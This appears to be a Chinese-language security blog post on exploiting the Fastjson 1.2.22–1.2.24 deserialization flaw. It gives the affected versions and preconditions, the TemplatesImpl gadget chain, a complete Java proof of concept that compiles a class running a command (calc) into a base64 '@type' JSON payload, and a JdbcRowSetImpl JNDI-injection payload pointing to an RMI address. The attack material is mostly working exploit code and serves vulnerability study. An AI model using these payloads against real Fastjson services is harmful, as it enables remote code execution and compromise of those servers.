Last updated on September 27, 2024 am
影响版本
Fastjson:1.2.22-1.2.24
利用条件
jdk8,springboot项目+依赖如下
1 2 3 4 5 6 7 8 9 10
| <dependency> <groupId>org.javassist</groupId> <artifactId>javassist</artifactId> <version>3.28.0-GA</version> </dependency> <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</version> </dependency>
|
使用的是JSON.parseObject(payload, Object.class, Feature.SupportNonPublicField)
这种格式的parseObject
或则是JSON.parse(payload,Feature.SupportNonPublicField);
这种格式
利用方法
TemplatsImpl链
利用链
1
| JSON::parseObject->DefaultJSONParser::parseObject->JavaObjectDeserializer::deserialze->DefaultJSONParser::parse->DefaultJSONParser::parseObject->JavaBeanDeserializer::deserialze->JavaBeanDeserializer::parseField->DefaultFieldDeserializer->parseField->FieldDeserializer->setValue->TemplatesImpl::getOutputProperties
|
后面就是接TemplatsImpl利用链了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| package com.example.demo;
import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.Feature; import com.alibaba.fastjson.parser.ParserConfig; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import javassist.ClassClassPath; import javassist.ClassPool; import javassist.CtClass; import javassist.CtConstructor; import org.apache.commons.codec.binary.Base64;
public class fastjsonTest { public static void main(String[] args) throws Exception { ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(AbstractTranslet.class)); CtClass cc=pool.makeClass("a"); cc.setSuperclass(pool.get(AbstractTranslet.class.getName())); CtConstructor ctConstructor=cc.makeClassInitializer(); ctConstructor.insertBefore("Runtime.getRuntime().exec(\"calc\");"); byte[] code=cc.toBytecode(); String code_base64= Base64.encodeBase64String(code); final String NASTY_CLASS="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; String payload= "{\"" + "@type\":\"" + NASTY_CLASS + "\"," + "\"" + "_bytecodes\":[\"" + code_base64 + "\"]," + "'_name':'aaa','" + "_tfactory':{ },\"" + "_outputProperties\":{ }," + "\"" + "_version\":\"1.0\",\"" + "allowedProtocols\":\"all\"}\n"; ParserConfig config=new ParserConfig(); Object obj= JSON.parseObject(payload,Object.class,config, Feature.SupportNonPublicField); } }
|
https://www.cnblogs.com/akka1/p/16138460.html
JdbcRowSetImpl链
这条链就是利用Fastjson反序列化导致JNDI注入从而命令执行,需要能出网
1 2 3 4 5 6 7 8 9 10 11 12
| package com.example.demo;
import com.alibaba.fastjson.JSON;
public class JdbcRowSetImplTest { public static void main(String[] args) throws Exception { String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1099/RCE\", \"autoCommit\":true}"; JSON.parse(PoC); }
}
|
https://blog.csdn.net/weixin_43263451/article/details/125862793
fastjson多种利用方式
https://www.cnblogs.com/nice0e3/p/14776043.html